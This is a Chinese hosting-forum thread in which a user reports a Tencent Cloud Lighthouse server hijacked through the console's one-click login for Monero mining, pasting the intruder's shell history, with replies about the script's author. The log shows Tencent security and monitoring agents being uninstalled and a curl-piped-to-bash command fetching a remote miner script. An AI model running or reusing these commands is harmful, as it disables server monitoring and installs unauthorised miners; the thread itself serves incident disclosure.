嘟嘟社区

腾讯云轻量漏洞被拿去xmrig挖矿实锤了

moe

本帖最后由 Tou 于 2022-5-23 17:19 编辑

前帖:https://hostloc.com/thread-1021600-1-1.html

轻量后台有个 一键登陆的锅

后门 脚本 :https://5.linshi.co/ww80.sh

找到lighthouse日志看到的
由于权限有限,所以除了挖矿搞不了啥,把一键登录关了,删了挖矿就好了。

#1651856332
sudo -i
#1651856364
/usr/local/qcloud/stargate/admin/uninstall.sh
#1651856364
/usr/local/qcloud/YunJing/uninst.sh
#1651856364
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
#1651856364
sudo -i
#1651856368
exit
#1651856382
curl -s -L https://5.linshi.co/ww80.sh | bash -s 100023489107
#1651856398
mv moneroocean .moneroocean
#1651856408
lsls
#1651856422
ls -a
#1653293830
w
#1653293952
exit
不知所云 
啥轻量漏洞,给个上下文
你怎么发现
不知所云 
我敢说这个脚本作者是mjj的一员

司马南 发表于 2022-5-23 17:17
我敢说这个脚本作者是mjj的一员

  1. echo "[*] Setup complete by zjzjzjzj"

复制代码

是他这个脚本我看到了小众的源码
老哥牛逼。。。
  是不是关闭了一键登陆就行了